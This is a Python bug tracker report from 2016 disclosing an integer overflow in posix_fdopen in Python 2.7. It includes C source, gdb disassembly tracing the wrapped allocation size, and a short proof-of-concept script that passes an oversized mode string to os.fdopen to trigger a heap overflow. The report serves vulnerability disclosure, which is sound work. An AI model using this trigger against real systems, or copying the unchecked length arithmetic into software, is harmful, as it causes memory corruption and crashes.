Message267447
I have tested this vulnerability on the Python 2.7 and it absolutely affected :). Integer overflow produce in posix_fdopen function. If an attacker sent fdopen mode value larger than max integer value (2*32) to fdopen after integer overflow occurred.
int fd;
char *orgmode = "r";
int bufsize = -1;
FILE *fp;
PyObject *f;
char *mode;
if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
return NULL;
/* Sanitize mode. See fileobject.c */
mode = PyMem_MALLOC(strlen(orgmode)+3);
...
strcpy(mode, orgmode);
os.fdopen(fd[, mode[, bufsize]])
fo = os.fdopen(fd, "r"*0xffffffff)
0x5e2595 <+86>: mov edi,eax
=> 0x5e2598 <+89>: call 0x416e50 <strlen@plt>
(gdb) print /x $eax
$1 = 0xffffffff
after does addition of "add" instruction therefore overflow occured and => 0x5e259d <+94>: add eax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory allocate after buffer copy== >
0x5e25a1 <+98>: mov edi,eax
0x5e25a4 <+101>: call 0x48f793 <_PyMem_DebugMalloc>
0x5e25cb <+140>: mov esi,edx
...
0x5e25ce <+143>: mov edi,eax
0x5e25d1 <+146>: call 0x416b80 <strcpy@plt>
copy buffer
strcpy(mode, orgmode); <=== overflow
poc:
#!/usr/bin/python
import os, sys
fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xffffff)
print "Closed the file successfully!!" |
|
Date |
User |
Action |
Args |
2016-06-05 18:01:37 | madness | set | recipients:
+ madness |
2016-06-05 18:01:37 | madness | set | messageid: <1465149697.95.0.775433257828.issue27235@psf.upfronthosting.co.za> |
2016-06-05 18:01:37 | madness | link | issue27235 messages |
2016-06-05 18:01:37 | madness | create | |
|